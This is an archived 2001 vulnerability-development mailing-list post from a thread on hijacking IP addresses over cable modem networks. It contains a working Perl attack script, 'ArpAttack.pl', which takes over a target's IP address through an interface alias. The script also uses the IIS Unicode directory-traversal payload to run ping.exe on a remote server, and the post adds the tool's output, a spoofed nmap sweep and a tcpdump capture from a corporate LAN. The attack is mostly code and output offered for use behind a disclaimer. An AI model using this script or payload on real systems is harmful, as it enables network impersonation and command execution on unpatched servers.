Vulnerability Development mailing list archives
Re: Hijack IP Address using cable modem
From: cdowns <cdowns () SKILLSOFT COM>
Date: Thu, 29 Mar 2001 09:33:43 -0500
playing around on my corporate LAN is gravy to accomplish this. Mediaone was a little more difficult but i wrote this little script to automate it ( this one works :)) here is my output: setting up network spoof .... ifconfig interface eth0:0 for spoof... . ---------------------------------------- eth0:0 Link encap:Ethernet HWaddr 00:10:A4:C4:23:45 inet addr:10.0.2.70 Bcast:10.0.3.255 Mask:255.255.254.0 UP BROADCAST RUNNING MTU:1500 Metric:1 Interrupt:3 Base address:0x300 wait.. . using target to send icmp request. ------------------------------------------- Reply from 10.0.2.70: bytes=32 time<10ms TTL=255 Reply from 10.0.2.70: bytes=32 time<10ms TTL=255 Reply from 10.0.2.70: bytes=32 time<10ms TTL=255 Reply from 10.0.2.70: bytes=32 time<10ms TTL=255 Ping statistics for 10.0.2.70: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms done happy spoofing dud3z ~! [root@scavenger /root]# perl script. #!/usr/bin/perl -w # ArpAttack.pl by: Christopher M Downs 04-28-01 # --------------------------------------------- # This program was inspired by a thread that started on vuln-dev () securityfocus com # most cable networks have ARP Broadcasts enabled so arp spoofing works on that network # this is a proof of concept program and is intended for educational purposes only therefore ! # i am not responsible for anything bad or just plain evil done with this program. # enough said you know the rules. # -D system ("clear"); use LWP::Simple; use Getopt::Std; getopts("t:n:b:u:?", \%args); if ( $args{t} ) { $target = $args{t}; } else { Usage(); } if ( $args{"?"} ){ Usage(); } # <--------------------------------------- ## this is where we need to create a network alias on the local machine\ ## for the network target we would like to spoof. ## we will cheat for now and use system calls just for the sake of getting something that works.... if ( $args{n} ) { $netmask = $args{n}; } if ( $args{b} ) { $broadcast = $args{b}; } print "setting up network spoof .... \n"; sleep 2; # system call here. system("/sbin/ifconfig eth0:0 $target netmask $netmask broadcast $broadcast"); print ("ifconfig interface eth0:0 for spoof... .\n"); print ("----------------------------------------\n"); system("/sbin/ifconfig eth0:0"); # use uni-code server for icmp to spoofed host. # <--------------------------------------- if ( $args{u} ) { $host_slut = $args{u}; $uni_target = get("http://$host_slut/scripts/..%c0%af../winnt/system32/ping.exe?+$target"); print "wait.. . using target to send icmp request.\n"; print "-------------------------------------------\n"; print ("$uni_target\n"); } print "done\n"; print "happy spoofing dud3z ~!\n"; # <--------------------------------------- sub Usage { print <<USAGE; Usage: perl ArpAttack.pl -t <target> -n -b -u <uni-code server> -? this menu -t <target to spoof> -n netmask -b broadcast -u uni-code server to use Sample: perl ArpAttack.pl -t 192.168.x.x -n 255.255.255.0 -b 192.168.0.255 -u 192.168.20.x Note: this program needs to be run as root USAGE exit; } nslookup of of targets dns: [root@scavenger /root]# nslookup scriptor.corp.skillsoft.com Server: dns.corp.skillsoft.com Address: 10.0.2.78 Name: scriptor.corp.skillsoft.com Address: 10.0.2.70 [root@scavenger /root]# reply from tcpdump session while doing pingsweep of network:: [root@scavenger /root]# nmap -S 10.0.2.70 -sP 10.0.2.2-100 [root@scavenger /root]# tcpdump -i eth0:0 -p icmp Kernel filter, protocol ALL, raw packet socket tcpdump: listening on eth0:0 09:19:10.730838 scriptor.corp.skillsoft.com > dns.corp.skillsoft.com: icmp: echo request 09:19:10.731211 dns.corp.skillsoft.com > scriptor.corp.skillsoft.com: icmp: echo reply 09:19:10.733107 scriptor.corp.skillsoft.com > dns2.corp.skillsoft.com: icmp: echo request 09:19:10.733461 dns2.corp.skillsoft.com > scriptor.corp.skillsoft.com: icmp: echo reply 09:19:10.740784 scriptor.corp.skillsoft.com > acd.corp.skillsoft.com: icmp: echo request 09:19:10.741454 scriptor.corp.skillsoft.com > 10.0.2.98: icmp: echo request 09:19:10.742037 acd.corp.skillsoft.com > scriptor.corp.skillsoft.com: icmp: echo reply 09:19:10.742089 10.0.2.98 > scriptor.corp.skillsoft.com: icmp: echo reply and obviously i get the replys on my end from nmap. -D
Current thread:
- Re: Hijack IP Address using cable modem, (continued)
- Re: Hijack IP Address using cable modem Reb (Mar 29)
- Re: Hijack IP Address using cable modem Patrick Maartense (Mar 28)
- Re: Hijack IP Address using cable modem Patrick Maartense (Mar 28)
- Re: Hijack IP Address using cable modem Nick Summy (Mar 29)
- Re: Hijack IP Address using cable modem David Laganière (Mar 29)
- Re: Hijack IP Address using cable modem Clayton Hoskinson (Mar 29)
- Re: Hijack IP Address using cable modem moksha faced (Mar 29)
- Re: Hijack IP Address using cable modem cdowns (Mar 28)
- Re: Hijack IP Address using cable modem Patrick Maartense (Mar 28)
- Re: Hijack IP Address using cable modem Williamson, Glenn (Mar 29)
- Re: Hijack IP Address using cable modem cdowns (Mar 29)